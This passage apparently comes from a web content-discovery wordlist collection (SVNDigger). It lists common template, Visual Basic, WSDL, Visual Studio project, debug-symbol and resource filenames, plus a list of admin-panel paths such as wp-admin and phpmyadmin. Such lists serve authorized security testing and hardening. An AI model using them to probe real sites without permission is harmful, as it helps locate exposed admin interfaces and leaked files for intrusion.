||||||
|
uacp_body.tpl
|
||||||
|
viewtopic_attach_body.tpl
|
||||||
|
captcha.tpl
|
||||||
|
year.tpl
|
||||||
|
change_password.tpl
|
||||||
|
common_footer.tpl
|
||||||
|
common_header.tpl
|
||||||
|
breadcrumb.tpl
|
||||||
|
browser.tpl
|
||||||
|
groups.tpl
|
||||||
|
delete_confirm.tpl
|
||||||
|
view_group.tpl
|
||||||
|
Administration.tpl
|
||||||
|
demo.tpl
|
||||||
|
import.tpl
|
||||||
|
upgrade.tpl
|
||||||
|
file.tpl
|
||||||
|
block.tpl
|
||||||
|
guestbook.tpl
|
||||||
|
faq.tpl
|
||||||
|
memberlist.tpl
|
||||||
|
template3.tpl
|
||||||
|
rename.tpl
|
||||||
|
module.tpl
|
||||||
|
front.tpl
|
||||||
|
train.tpl
|
||||||
|
option.tpl
|
||||||
|
country.tpl
|
||||||
|
battle.tpl
|
||||||
|
navbar.tpl
|
||||||
|
search_form.tpl
|
||||||
|
standard.tpl
|
||||||
|
forums.tpl
|
||||||
|
source.tpl
|
||||||
|
addnews.tpl
|
||||||
|
contact_form.tpl
|
||||||
|
center.tpl
|
||||||
|
left.tpl
|
||||||
|
warning.tpl
|
||||||
|
pagina.tpl
|
||||||
|
data.tpl
|
||||||
|
fckeditor.tpl
|
||||||
|
login_ok.tpl
|
||||||
|
posts.tpl
|
||||||
|
admin_categories.tpl
|
||||||
|
toc.tpl
|
||||||
|
Configuration.tpl
|
||||||
|
logging.tpl
|
||||||
|
registration.tpl
|
||||||
|
board.tpl
|
||||||
|
admin.header.tpl
|
||||||
|
admin.users.tpl
|
||||||
|
a.tpl
|
||||||
|
discussion.tpl
|
||||||
|
linklist.tpl
|
||||||
|
filelist.tpl
|
||||||
|
buglist.tpl
|
||||||
|
categorylist.tpl
|
||||||
|
bugreport.tpl
|
||||||
|
personedit.tpl
|
||||||
|
personlist.tpl
|
||||||
|
errormessage.tpl
|
||||||
|
forumlist.tpl
|
||||||
|
messagelist.tpl
|
||||||
|
messageform.tpl
|
||||||
|
configure.tpl
|
||||||
|
newsarchive.tpl
|
||||||
|
newslist.tpl
|
||||||
|
question.tpl
|
||||||
|
sectionlist.tpl
|
||||||
|
global_footer.tpl
|
||||||
|
global_header.tpl
|
||||||
|
currency.tpl
|
||||||
|
checkout.tpl
|
||||||
|
grouplist.tpl
|
||||||
|
info.tpl
|
||||||
|
userinfo.tpl
|
||||||
|
not_found.tpl
|
||||||
|
activate_email.tpl
|
||||||
|
activate_password.tpl
|
||||||
|
edit_post.tpl
|
||||||
|
form_email.tpl
|
||||||
|
new_reply.tpl
|
||||||
|
new_reply_full.tpl
|
||||||
|
pm.tpl
|
||||||
|
ModelBase.tpl
|
||||||
|
ModelStub.tpl
|
||||||
|
entry.tpl
|
||||||
|
profile_edit.tpl
|
||||||
|
server_info.tpl
|
||||||
|
mod_pwd.tpl
|
||||||
|
pay.tpl
|
||||||
|
poll.tpl
|
||||||
|
answer.tpl
|
||||||
|
upload_image.tpl
|
||||||
|
locale.tpl
|
||||||
|
xml.tpl
|
||||||
|
ExtensionNode.tpl
|
||||||
|
ExtensionNodePeer.tpl
|
||||||
|
NodePeer.tpl
|
||||||
|
database-end.tpl
|
||||||
|
database-start.tpl
|
||||||
|
viewitem.tpl
|
||||||
|
view_list.tpl
|
||||||
|
_login.tpl
|
||||||
|
eval.tpl
|
||||||
|
invoice.tpl
|
||||||
|
addnew.tpl
|
||||||
|
button.tpl
|
||||||
|
bad.tpl
|
||||||
|
delete_topic.tpl
|
||||||
|
edit_topic.tpl
|
||||||
|
last.tpl
|
||||||
|
topics.tpl
|
||||||
|
associated_object.tpl
|
||||||
|
associated_object_manytomany.tpl
|
||||||
|
associated_objects_methods.tpl
|
||||||
|
class_load_and_count_methods.tpl
|
||||||
|
index_load_array.tpl
|
||||||
|
index_load_array_manytomany.tpl
|
||||||
|
index_load_methods.tpl
|
||||||
|
index_load_single.tpl
|
||||||
|
instantiation_methods.tpl
|
||||||
|
manual_query_methods.tpl
|
||||||
|
object_delete.tpl
|
||||||
|
object_reload.tpl
|
||||||
|
object_save.tpl
|
||||||
|
property_comments.tpl
|
||||||
|
property_get.tpl
|
||||||
|
property_set.tpl
|
||||||
|
protected_member_objects.tpl
|
||||||
|
protected_member_variables.tpl
|
||||||
|
qcodo_query_classes.tpl
|
||||||
|
qcodo_query_methods.tpl
|
||||||
|
soap_methods.tpl
|
||||||
|
example_load_methods.tpl
|
||||||
|
example_properties.tpl
|
||||||
|
_qform_edit.tpl
|
||||||
|
_qform_edit_include.tpl
|
||||||
|
_qform_list.tpl
|
||||||
|
_qform_list_include.tpl
|
||||||
|
_qpanel_edit.tpl
|
||||||
|
_qpanel_edit_template.tpl
|
||||||
|
_qpanel_list.tpl
|
||||||
|
_qpanel_list_template.tpl
|
||||||
|
_subclass.tpl
|
||||||
|
constructor.tpl
|
||||||
|
control_create_QDateTime.tpl
|
||||||
|
control_create_boolean.tpl
|
||||||
|
control_create_double.tpl
|
||||||
|
control_create_identity.tpl
|
||||||
|
control_create_integer.tpl
|
||||||
|
control_create_manytomany_reference.tpl
|
||||||
|
control_create_reference.tpl
|
||||||
|
control_create_string.tpl
|
||||||
|
control_create_type.tpl
|
||||||
|
control_create_unique_reversereference.tpl
|
||||||
|
control_refresh_QDateTime.tpl
|
||||||
|
control_refresh_boolean.tpl
|
||||||
|
control_refresh_double.tpl
|
||||||
|
control_refresh_identity.tpl
|
||||||
|
control_refresh_integer.tpl
|
||||||
|
control_refresh_manytomany_reference.tpl
|
||||||
|
control_refresh_reference.tpl
|
||||||
|
control_refresh_string.tpl
|
||||||
|
control_refresh_type.tpl
|
||||||
|
control_refresh_unique_reversereference.tpl
|
||||||
|
control_update_calendar.tpl
|
||||||
|
control_update_checkbox.tpl
|
||||||
|
control_update_manytomany_reference.tpl
|
||||||
|
control_update_reference.tpl
|
||||||
|
control_update_textbox.tpl
|
||||||
|
control_update_type.tpl
|
||||||
|
control_update_unique_reversereference.tpl
|
||||||
|
create_methods.tpl
|
||||||
|
delete_object.tpl
|
||||||
|
property_get_case.tpl
|
||||||
|
property_set_case.tpl
|
||||||
|
refresh_methods.tpl
|
||||||
|
save_object.tpl
|
||||||
|
update_methods.tpl
|
||||||
|
variable_declarations.tpl
|
||||||
|
meta_add_column.tpl
|
||||||
|
meta_add_edit_column.tpl
|
||||||
|
meta_add_type_column.tpl
|
||||||
|
meta_data_binder.tpl
|
||||||
|
resolve_content_item.tpl
|
||||||
|
resolve_content_item_case.tpl
|
||||||
|
admin.menu.tpl
|
||||||
|
html_footer.tpl
|
||||||
|
mail_results.tpl
|
||||||
|
join.tpl
|
||||||
|
doctype.tpl
|
||||||
|
lostpassword.tpl
|
||||||
|
events.tpl
|
||||||
|
install_error.tpl
|
||||||
|
install_footer.tpl
|
||||||
|
install_header.tpl
|
||||||
|
admin_cron.tpl
|
||||||
|
google.tpl
|
||||||
|
write.tpl
|
||||||
|
fetch.tpl
|
||||||
|
state.tpl
|
||||||
|
close.tpl
|
||||||
|
done.tpl
|
||||||
|
active.tpl
|
||||||
|
wizard.tpl
|
||||||
|
version.tpl
|
||||||
|
start.tpl
|
||||||
|
agenda.tpl
|
||||||
|
information.tpl
|
||||||
|
preview.tpl
|
||||||
|
sponsors.tpl
|
||||||
|
inbox.tpl
|
||||||
|
deactivate.tpl
|
||||||
|
recent.tpl
|
||||||
|
files.tpl
|
||||||
|
ip.tpl
|
||||||
|
ShowCart.tpl
|
||||||
|
completed.tpl
|
||||||
|
reviews.tpl
|
||||||
|
storyindex.tpl
|
||||||
|
viewstory.tpl
|
||||||
|
left_column.tpl
|
||||||
|
news_list.tpl
|
||||||
|
right_column.tpl
|
||||||
|
edit_event.tpl
|
||||||
|
edit_gallery.tpl
|
||||||
|
editpage.tpl
|
||||||
|
edit_page.tpl
|
||||||
|
addgroup.tpl
|
||||||
|
first.tpl
|
||||||
|
Friends.tpl
|
||||||
|
sys_log.tpl
|
||||||
|
bill.tpl
|
||||||
|
common.tpl
|
||||||
|
member.tpl
|
||||||
|
order.tpl
|
||||||
|
init.tpl
|
||||||
|
js.tpl
|
||||||
|
report2.tpl
|
||||||
|
classleft.tpl
|
||||||
|
contents.hhc.tpl
|
||||||
|
fileleft.tpl
|
||||||
|
hhp.tpl
|
||||||
|
index.hhk.tpl
|
||||||
|
packages.tpl
|
||||||
|
tocentry.tpl
|
||||||
|
left_frame.tpl
|
||||||
|
top_frame.tpl
|
||||||
|
constants.tpl
|
||||||
|
_head.tpl
|
||||||
|
generate.tpl
|
||||||
|
all.tpl
|
||||||
|
video.tpl
|
||||||
|
listusers.tpl
|
||||||
|
media_index.tpl
|
||||||
|
view_form.tpl
|
||||||
|
view_index.tpl
|
||||||
|
_footer.tpl
|
||||||
|
MainLayout.tpl
|
||||||
|
FlexApp.tpl
|
||||||
|
AccountPortlet.tpl
|
||||||
|
ArchivePortlet.tpl
|
||||||
|
CategoryPortlet.tpl
|
||||||
|
CommentPortlet.tpl
|
||||||
|
LoginPortlet.tpl
|
||||||
|
SearchPortlet.tpl
|
||||||
|
PostRenderer.tpl
|
||||||
|
CommentBlock.tpl
|
||||||
|
RequiresVersion.tpl
|
||||||
|
RunBar.tpl
|
||||||
|
SampleLayout.tpl
|
||||||
|
SinceVersion.tpl
|
||||||
|
LanguageList.tpl
|
||||||
|
LabeledTextBox.tpl
|
||||||
|
RegionDisplay.tpl
|
||||||
|
CategoryDataList.tpl
|
||||||
|
TimeEntryList.tpl
|
||||||
|
forgotpass.tpl
|
||||||
|
def_birthday_def.tpl
|
||||||
|
def_ranks_def.tpl
|
||||||
|
def_smilies_def.tpl
|
||||||
|
def_themes_def.tpl
|
||||||
|
def_tree_def.tpl
|
||||||
|
def_words_def.tpl
|
||||||
|
nav.tpl
|
||||||
|
Books.tpl
|
||||||
|
mainPageView.tpl
|
||||||
|
RightNav.tpl
|
||||||
|
TopList.tpl
|
||||||
|
board_config_extend_body.tpl
|
||||||
|
forum_extend_body.tpl
|
||||||
|
forum_extend_edit_body.tpl
|
||||||
|
index_box.tpl
|
||||||
|
register_body.tpl
|
||||||
|
topics_list_box.tpl
|
||||||
|
entity.tpl
|
||||||
|
sql.tpl
|
||||||
|
dialog_footer.tpl
|
||||||
|
dialog_header.tpl
|
||||||
|
editor_floating.tpl
|
||||||
|
toolbar_floating.tpl
|
||||||
|
listings.tpl
|
||||||
|
admin_config.tpl
|
||||||
|
index_admin.tpl
|
||||||
|
Boards.tpl
|
||||||
|
archives.tpl
|
||||||
|
week.tpl
|
||||||
|
activation.tpl
|
||||||
|
common_breadcrumb.tpl
|
||||||
|
common_managebar.tpl
|
||||||
|
common_menubar.tpl
|
||||||
|
common_menubar1.tpl
|
||||||
|
common_message.tpl
|
||||||
|
paginator.tpl
|
||||||
|
contacto.tpl
|
||||||
|
edit_content.tpl
|
||||||
|
accounts.tpl
|
||||||
|
add_message.tpl
|
||||||
|
manage_messages.tpl
|
||||||
|
manage_messages_message.tpl
|
||||||
|
sermons.tpl
|
||||||
|
add_group.tpl
|
||||||
|
add_user.tpl
|
||||||
|
delete_confirm_group.tpl
|
||||||
|
manage_group.tpl
|
||||||
|
manage_groups.tpl
|
||||||
|
manage_user.tpl
|
||||||
|
view_user.tpl
|
||||||
|
roadmap.tpl
|
||||||
|
pager.tpl
|
||||||
|
block_powered_by.tpl
|
||||||
|
imprint.tpl
|
||||||
|
admin_forums.tpl
|
||||||
|
admin_log.tpl
|
||||||
|
admin_smilies.tpl
|
||||||
|
rss_body.tpl
|
||||||
|
changemail.tpl
|
||||||
|
alert.tpl
|
||||||
|
save.tpl
|
||||||
|
new_pm.tpl
|
||||||
|
admin_save.tpl
|
||||||
|
field.tpl
|
||||||
|
server.tpl
|
||||||
|
query.tpl
|
||||||
|
invite.tpl
|
||||||
|
themes.tpl
|
||||||
|
userdel.tpl
|
||||||
|
userview.tpl
|
||||||
|
announcement.tpl
|
||||||
|
parent.tpl
|
||||||
|
style.tpl
|
||||||
|
client.tpl
|
||||||
|
whois.tpl
|
||||||
|
choose.tpl
|
||||||
|
opentable.tpl
|
||||||
|
closetable.tpl
|
||||||
|
newtopic.tpl
|
||||||
|
changepassword.tpl
|
||||||
|
setting.tpl
|
||||||
|
list_files.tpl
|
||||||
|
ok.tpl
|
||||||
|
opensearch.tpl
|
||||||
|
comment_list.tpl
|
||||||
|
mseNav.tpl
|
||||||
|
forum.tpl
|
||||||
|
sideBox.tpl
|
||||||
|
catform.tpl
|
||||||
|
userform.tpl
|
||||||
|
command.tpl
|
||||||
|
impressum.tpl
|
||||||
|
language.tpl
|
||||||
|
credits.tpl
|
||||||
|
item.tpl
|
||||||
|
end.tpl
|
||||||
|
contents.tpl
|
||||||
|
url.tpl
|
||||||
|
newsletter_confirm.tpl
|
||||||
|
newsletter_index.tpl
|
||||||
|
newsletter_sent.tpl
|
||||||
|
news_index.tpl
|
||||||
|
forum_header.tpl
|
||||||
|
auth_login.tpl
|
||||||
|
user_menu.tpl
|
||||||
|
reminder.tpl
|
||||||
|
test.savant.simple.tpl
|
||||||
|
test.smarty.simple.tpl
|
||||||
|
test.flexy.form.tpl
|
||||||
|
test.phpTal.form.tpl
|
||||||
|
test.savant.form.tpl
|
||||||
|
test.flexy.simple.tpl
|
||||||
|
test.phpTal.simple.tpl
|
||||||
|
test.smarty.form.tpl
|
||||||
|
sample.tpl
|
||||||
|
window.tpl
|
||||||
|
listView.tpl
|
||||||
|
UserMan.tpl
|
||||||
|
MenuItem.tpl
|
||||||
|
Input.tpl
|
||||||
|
closetable2.tpl
|
||||||
|
opentable2.tpl
|
||||||
|
bows.tpl
|
||||||
|
kowal.tpl
|
||||||
|
updates.tpl
|
||||||
|
wieza.tpl
|
||||||
|
travel.tpl
|
||||||
|
head1.tpl
|
||||||
|
market.tpl
|
||||||
|
bugtrack.tpl
|
||||||
|
rest.tpl
|
||||||
|
tribeware.tpl
|
||||||
|
las.tpl
|
||||||
|
czary.tpl
|
||||||
|
grid.tpl
|
||||||
|
library.tpl
|
||||||
|
landfill.tpl
|
||||||
|
klasa.tpl
|
||||||
|
house.tpl
|
||||||
|
tower.tpl
|
||||||
|
farm.tpl
|
||||||
|
deity.tpl
|
||||||
|
lumberjack.tpl
|
||||||
|
turnfight1.tpl
|
||||||
|
mines.tpl
|
||||||
|
msklep.tpl
|
||||||
|
lumbermill.tpl
|
||||||
|
court.tpl
|
||||||
|
weapons.tpl
|
||||||
|
ap.tpl
|
||||||
|
tforums.tpl
|
||||||
|
newspaper.tpl
|
||||||
|
core.tpl
|
||||||
|
warehouse.tpl
|
||||||
|
addupdate.tpl
|
||||||
|
rasa.tpl
|
||||||
|
jail.tpl
|
||||||
|
maze.tpl
|
||||||
|
error1.tpl
|
||||||
|
kopalnia.tpl
|
||||||
|
alchemist.tpl
|
||||||
|
staff.tpl
|
||||||
|
hospital.tpl
|
||||||
|
outposts.tpl
|
||||||
|
mmarket.tpl
|
||||||
|
referrals.tpl
|
||||||
|
equip.tpl
|
||||||
|
imarket.tpl
|
||||||
|
sedzia.tpl
|
||||||
|
pmarket.tpl
|
||||||
|
hof.tpl
|
||||||
|
notatnik.tpl
|
||||||
|
quest.tpl
|
||||||
|
turnfight.tpl
|
||||||
|
tribearmor.tpl
|
||||||
|
monuments.tpl
|
||||||
|
chatmsgs.tpl
|
||||||
|
tribes.tpl
|
||||||
|
zloto.tpl
|
||||||
|
gory.tpl
|
||||||
|
temple.tpl
|
||||||
|
armor.tpl
|
||||||
|
hmarket.tpl
|
||||||
|
activ.tpl
|
||||||
|
passwd.tpl
|
||||||
40
Discovery/SVNDigger/cat/Language/vb.txt
Normal file
40
Discovery/SVNDigger/cat/Language/vb.txt
Normal file
@@ -0,0 +1,40 @@
|
|||||||
|
AssemblyInfo.vb
|
||||||
|
Default.aspx.vb
|
||||||
|
Application.Designer.vb
|
||||||
|
Resources.Designer.vb
|
||||||
|
Settings.Designer.vb
|
||||||
|
Form1.vb
|
||||||
|
module1.vb
|
||||||
|
Global.asax.vb
|
||||||
|
Form1.Designer.vb
|
||||||
|
Default.aspx.designer.vb
|
||||||
|
Login.aspx.vb
|
||||||
|
Main.vb
|
||||||
|
Table.vb
|
||||||
|
Class1.vb
|
||||||
|
feed-proxy.ashx.vb
|
||||||
|
View.aspx.vb
|
||||||
|
Schema.vb
|
||||||
|
User.vb
|
||||||
|
Login.aspx.designer.vb
|
||||||
|
About.vb
|
||||||
|
ApplicationEvents.vb
|
||||||
|
Crypt.vb
|
||||||
|
Config.vb
|
||||||
|
DataAccess.vb
|
||||||
|
SqlBuilder.vb
|
||||||
|
Settings.vb
|
||||||
|
Enumerations.vb
|
||||||
|
Default.Master.vb
|
||||||
|
compras.vb
|
||||||
|
proveedores.vb
|
||||||
|
Persona.vb
|
||||||
|
MainForm.vb
|
||||||
|
Program.vb
|
||||||
|
uccategories.ascx.vb
|
||||||
|
HelloWorld.vb
|
||||||
|
HomeController.vb
|
||||||
|
Node.vb
|
||||||
|
Project.vb
|
||||||
|
Type.vb
|
||||||
|
MyWebExtension.vb
|
||||||
9
Discovery/SVNDigger/cat/Language/wsdl.txt
Normal file
9
Discovery/SVNDigger/cat/Language/wsdl.txt
Normal file
@@ -0,0 +1,9 @@
|
|||||||
|
AWSECommerceService.wsdl
|
||||||
|
UserService.wsdl
|
||||||
|
Authentication.wsdl
|
||||||
|
ProjectService.wsdl
|
||||||
|
customer.wsdl
|
||||||
|
domain.wsdl
|
||||||
|
domaincontact.wsdl
|
||||||
|
domainuscontact.wsdl
|
||||||
|
fund.wsdl
|
||||||
38
Discovery/SVNDigger/cat/Project/csproj.txt
Normal file
38
Discovery/SVNDigger/cat/Project/csproj.txt
Normal file
@@ -0,0 +1,38 @@
|
|||||||
|
WebSite.csproj
|
||||||
|
tests.csproj
|
||||||
|
UnitTests.csproj
|
||||||
|
Web.csproj
|
||||||
|
Core.csproj
|
||||||
|
IntegrationTests.csproj
|
||||||
|
Model.csproj
|
||||||
|
Framework.csproj
|
||||||
|
CrudScaffolding.csproj
|
||||||
|
Bll.csproj
|
||||||
|
Entities.csproj
|
||||||
|
DAL.csproj
|
||||||
|
DataAccess.csproj
|
||||||
|
DependencyResolution.csproj
|
||||||
|
Infrastructure.csproj
|
||||||
|
UI.csproj
|
||||||
|
Test.csproj
|
||||||
|
build.csproj
|
||||||
|
DataLayer.csproj
|
||||||
|
Demo.csproj
|
||||||
|
Domain.csproj
|
||||||
|
Data.csproj
|
||||||
|
DataAssembly.csproj
|
||||||
|
Realestate.csproj
|
||||||
|
Common.csproj
|
||||||
|
RegressionTests.csproj
|
||||||
|
Logging.csproj
|
||||||
|
Security.csproj
|
||||||
|
ConsoleApplication1.csproj
|
||||||
|
Example.csproj
|
||||||
|
jQueryMvc.csproj
|
||||||
|
Specifications.csproj
|
||||||
|
SampleLibrary.csproj
|
||||||
|
MvcDemo.csproj
|
||||||
|
MvcValidation.csproj
|
||||||
|
Tools.csproj
|
||||||
|
xmlrpc.csproj
|
||||||
|
TestApp.csproj
|
||||||
112
Discovery/SVNDigger/cat/Project/pdb.txt
Normal file
112
Discovery/SVNDigger/cat/Project/pdb.txt
Normal file
@@ -0,0 +1,112 @@
|
|||||||
|
NHibernate.pdb
|
||||||
|
Moq.pdb
|
||||||
|
FluentNHibernate.pdb
|
||||||
|
Castle.Core.pdb
|
||||||
|
Iesi.Collections.pdb
|
||||||
|
Castle.DynamicProxy2.pdb
|
||||||
|
Castle.MicroKernel.pdb
|
||||||
|
Castle.Windsor.pdb
|
||||||
|
Castle.DynamicProxy.pdb
|
||||||
|
MvcContrib.pdb
|
||||||
|
AjaxControlToolkit.pdb
|
||||||
|
Castle.Services.Transaction.pdb
|
||||||
|
Castle.Components.Validator.pdb
|
||||||
|
Rhino.Commons.pdb
|
||||||
|
Microsoft.Web.Mvc.pdb
|
||||||
|
NHibernate.Linq.pdb
|
||||||
|
Castle.Components.Binder.pdb
|
||||||
|
MvcContrib.Castle.pdb
|
||||||
|
Castle.ActiveRecord.pdb
|
||||||
|
Castle.Facilities.AutomaticTransactionManagement.pdb
|
||||||
|
Rhino.DSL.pdb
|
||||||
|
Spark.pdb
|
||||||
|
Rhino.Commons.Clr.pdb
|
||||||
|
NVelocity.pdb
|
||||||
|
SharpArch.Core.NHibernateValidator.pdb
|
||||||
|
SharpArch.Core.pdb
|
||||||
|
SharpArch.Data.pdb
|
||||||
|
SharpArch.Testing.NUnit.pdb
|
||||||
|
SharpArch.Testing.pdb
|
||||||
|
SharpArch.Web.Castle.pdb
|
||||||
|
SharpArch.Web.pdb
|
||||||
|
Spark.Web.Mvc.pdb
|
||||||
|
NAnt.Core.pdb
|
||||||
|
NAnt.pdb
|
||||||
|
FluentNHibernate.Framework.pdb
|
||||||
|
Microsoft.Practices.ServiceLocation.pdb
|
||||||
|
Rhino.Commons.NHibernate.pdb
|
||||||
|
Newtonsoft.Json.pdb
|
||||||
|
Castle.Components.Common.EmailSender.pdb
|
||||||
|
Castle.MonoRail.ActiveRecordSupport.pdb
|
||||||
|
Castle.MonoRail.Framework.Views.NVelocity.pdb
|
||||||
|
Castle.MonoRail.Framework.pdb
|
||||||
|
Castle.MonoRail.TestSupport.pdb
|
||||||
|
Castle.MonoRail.Views.Brail.pdb
|
||||||
|
Castle.MonoRail.WindsorExtension.pdb
|
||||||
|
Castle.Services.Logging.Log4netIntegration.pdb
|
||||||
|
Rhino.Mocks.pdb
|
||||||
|
NAnt.Contrib.Tasks.pdb
|
||||||
|
Bll.pdb
|
||||||
|
Castle.Facilities.NHibernateIntegration.pdb
|
||||||
|
MvcContrib.FluentHtml.pdb
|
||||||
|
MvcContrib.TestHelper.pdb
|
||||||
|
NAnt.CompressionTasks.pdb
|
||||||
|
NAnt.DotNetTasks.pdb
|
||||||
|
NAnt.MSNetTasks.pdb
|
||||||
|
NAnt.NUnit.pdb
|
||||||
|
NAnt.NUnit1Tasks.pdb
|
||||||
|
NAnt.NUnit2Tasks.pdb
|
||||||
|
NAnt.SourceControlTasks.pdb
|
||||||
|
NAnt.VSNetTasks.pdb
|
||||||
|
NAnt.VisualCppTasks.pdb
|
||||||
|
NAnt.Win32Tasks.pdb
|
||||||
|
NDoc.Documenter.NAnt.pdb
|
||||||
|
NAnt.MSBuild.pdb
|
||||||
|
Rhino.Commons.ActiveRecord.pdb
|
||||||
|
Castle.Components.Common.TemplateEngine.NVelocityTemplateEngine.pdb
|
||||||
|
Castle.Components.Common.TemplateEngine.pdb
|
||||||
|
Castle.Facilities.ActiveRecordIntegration.pdb
|
||||||
|
Castle.Facilities.Logging.pdb
|
||||||
|
Castle.Services.Logging.NLogIntegration.pdb
|
||||||
|
Rhino.Testing.pdb
|
||||||
|
DataAssembly.pdb
|
||||||
|
Entities.pdb
|
||||||
|
Elmah.pdb
|
||||||
|
Cassini.pdb
|
||||||
|
CCNet.Gallio.WebDashboard.Plugin.pdb
|
||||||
|
Gallio.Ambience.pdb
|
||||||
|
Gallio.Reports.pdb
|
||||||
|
Gallio.UI.pdb
|
||||||
|
Gallio.pdb
|
||||||
|
Gallio35.pdb
|
||||||
|
MbUnit.Compatibility.pdb
|
||||||
|
MbUnit.pdb
|
||||||
|
MbUnit35.pdb
|
||||||
|
MvcContrib.ModelAttributes.pdb
|
||||||
|
MvcContrib.StructureMap.pdb
|
||||||
|
Naak.HtmlRules.pdb
|
||||||
|
Tjoc.Web.Validator.pdb
|
||||||
|
Coderoom.Build.Tasks.pdb
|
||||||
|
Iesi.Collections.Test.pdb
|
||||||
|
StructureMap.pdb
|
||||||
|
AutoMapper.pdb
|
||||||
|
ConsoleApplication1.pdb
|
||||||
|
System.Web.Mvc.pdb
|
||||||
|
CrypterClassLib.pdb
|
||||||
|
WinApp.pdb
|
||||||
|
Rhino.Commons.Binsor.pdb
|
||||||
|
model.pdb
|
||||||
|
AddressDB.pdb
|
||||||
|
NHibernate.ByteCode.Castle.pdb
|
||||||
|
Castle.Facilities.BatchRegistration.pdb
|
||||||
|
Castle.Facilities.Cache.pdb
|
||||||
|
Castle.Facilities.DynamicLoader.pdb
|
||||||
|
Castle.Facilities.IBatisNetIntegration.pdb
|
||||||
|
Castle.Facilities.Prevalence.pdb
|
||||||
|
Castle.MonoRail.ActiveRecordScaffold.pdb
|
||||||
|
Castle.VSNetIntegration.CastleWizards.pdb
|
||||||
|
NVelocity.Tests.pdb
|
||||||
|
Castle.ActiveRecord.Tests.Model.pdb
|
||||||
|
Castle.Components.DictionaryAdapter.pdb
|
||||||
|
Castle.Components.Validator.Tests.pdb
|
||||||
|
Castle.MonoRail.TransformFilters.pdb
|
||||||
60
Discovery/SVNDigger/cat/Project/resx.txt
Normal file
60
Discovery/SVNDigger/cat/Project/resx.txt
Normal file
@@ -0,0 +1,60 @@
|
|||||||
|
Resources.resx
|
||||||
|
Form1.resx
|
||||||
|
MainForm.resx
|
||||||
|
Resource.resx
|
||||||
|
Default.aspx.resx
|
||||||
|
Strings.resx
|
||||||
|
Main.resx
|
||||||
|
frmMain.resx
|
||||||
|
About.resx
|
||||||
|
ProjectInstaller.resx
|
||||||
|
Login.aspx.resx
|
||||||
|
Global.asax.resx
|
||||||
|
AboutBox1.resx
|
||||||
|
AboutForm.resx
|
||||||
|
LoginForm.resx
|
||||||
|
frmTest.resx
|
||||||
|
CommandBar.resx
|
||||||
|
Bugs.aspx.resx
|
||||||
|
Languages.ascx.resx
|
||||||
|
AddForm.resx
|
||||||
|
labels.af.resx
|
||||||
|
labels.ar.resx
|
||||||
|
labels.bg.resx
|
||||||
|
labels.cs.resx
|
||||||
|
labels.da.resx
|
||||||
|
labels.de.resx
|
||||||
|
labels.el-GR.resx
|
||||||
|
labels.es.resx
|
||||||
|
labels.fa.resx
|
||||||
|
labels.fi.resx
|
||||||
|
labels.fr.resx
|
||||||
|
labels.he.resx
|
||||||
|
labels.hu.resx
|
||||||
|
labels.is.resx
|
||||||
|
labels.it.resx
|
||||||
|
labels.mk.resx
|
||||||
|
labels.nl-be.resx
|
||||||
|
labels.nl.resx
|
||||||
|
labels.no.resx
|
||||||
|
labels.pt-BR.resx
|
||||||
|
labels.resx
|
||||||
|
labels.ru.resx
|
||||||
|
labels.sk.resx
|
||||||
|
labels.sl.resx
|
||||||
|
labels.sq.resx
|
||||||
|
labels.sv.resx
|
||||||
|
labels.th.resx
|
||||||
|
labels.tr.resx
|
||||||
|
labels.uk.resx
|
||||||
|
labels.zh-CN.resx
|
||||||
|
labels.zh-TW.resx
|
||||||
|
Resource.de.resx
|
||||||
|
Resource.es.resx
|
||||||
|
Resource.nl.resx
|
||||||
|
strings.ru.resx
|
||||||
|
General.resx
|
||||||
|
Users.aspx.resx
|
||||||
|
Settings.aspx.resx
|
||||||
|
Language.resx
|
||||||
|
Error.aspx.resx
|
||||||
12
Discovery/SVNDigger/cat/Project/sln.txt
Normal file
12
Discovery/SVNDigger/cat/Project/sln.txt
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
BookStore.sln
|
||||||
|
bookonline.sln
|
||||||
|
WebSite1.sln
|
||||||
|
CMS.sln
|
||||||
|
CodeCampServer.sln
|
||||||
|
Portal.sln
|
||||||
|
Test.sln
|
||||||
|
MyBlog.sln
|
||||||
|
Demo.sln
|
||||||
|
TinyMCE.sln
|
||||||
|
SNEG.sln
|
||||||
|
Voltage.sln
|
||||||
2
Discovery/SVNDigger/cat/Project/suo.txt
Normal file
2
Discovery/SVNDigger/cat/Project/suo.txt
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
BookStore.suo
|
||||||
|
SNEG.suo
|
||||||
1
Discovery/SVNDigger/cat/Project/vbproj.txt
Normal file
1
Discovery/SVNDigger/cat/Project/vbproj.txt
Normal file
@@ -0,0 +1 @@
|
|||||||
|
Plugins.vbproj
|
||||||
413
Discovery/SVNDigger/context/admin.txt
Normal file
413
Discovery/SVNDigger/context/admin.txt
Normal file
@@ -0,0 +1,413 @@
|
|||||||
|
admin
|
||||||
|
sadmin
|
||||||
|
admins
|
||||||
|
kadmin
|
||||||
|
_admin
|
||||||
|
admincp
|
||||||
|
myadmin
|
||||||
|
admin.py
|
||||||
|
cmsadmin
|
||||||
|
wp-admin
|
||||||
|
admin.db
|
||||||
|
admin.htm
|
||||||
|
admin.ini
|
||||||
|
admin.asp
|
||||||
|
admin.ctp
|
||||||
|
shopadmin
|
||||||
|
admin.tpl
|
||||||
|
com_admin
|
||||||
|
admin_img
|
||||||
|
admin.php
|
||||||
|
admin.txt
|
||||||
|
admin.xml
|
||||||
|
admin_vote
|
||||||
|
admin_menu
|
||||||
|
Phpmyadmin
|
||||||
|
e107_admin
|
||||||
|
adminpanel
|
||||||
|
adminfiles
|
||||||
|
admin2.php
|
||||||
|
admin.html
|
||||||
|
admins.php
|
||||||
|
admin.php3
|
||||||
|
admin.aspx
|
||||||
|
_admin.php
|
||||||
|
admin1.php
|
||||||
|
admin.thtml
|
||||||
|
admin_users
|
||||||
|
admin.rhtml
|
||||||
|
xgadmin.asp
|
||||||
|
pnadmin.php
|
||||||
|
admin_setup
|
||||||
|
blocksadmin
|
||||||
|
administrar
|
||||||
|
admin.phtml
|
||||||
|
myadmin.asp
|
||||||
|
admincp.php
|
||||||
|
adminfaq.php
|
||||||
|
joomla_admin
|
||||||
|
admin_db.php
|
||||||
|
admin_compat
|
||||||
|
adminBar.php
|
||||||
|
caladmin.php
|
||||||
|
modulesadmin
|
||||||
|
gv_admin.php
|
||||||
|
adminlog.php
|
||||||
|
newadmin.asp
|
||||||
|
admin_themes
|
||||||
|
adminnav.php
|
||||||
|
admin_dj.asp
|
||||||
|
admin_images
|
||||||
|
admin-db.php
|
||||||
|
smsadmin.php
|
||||||
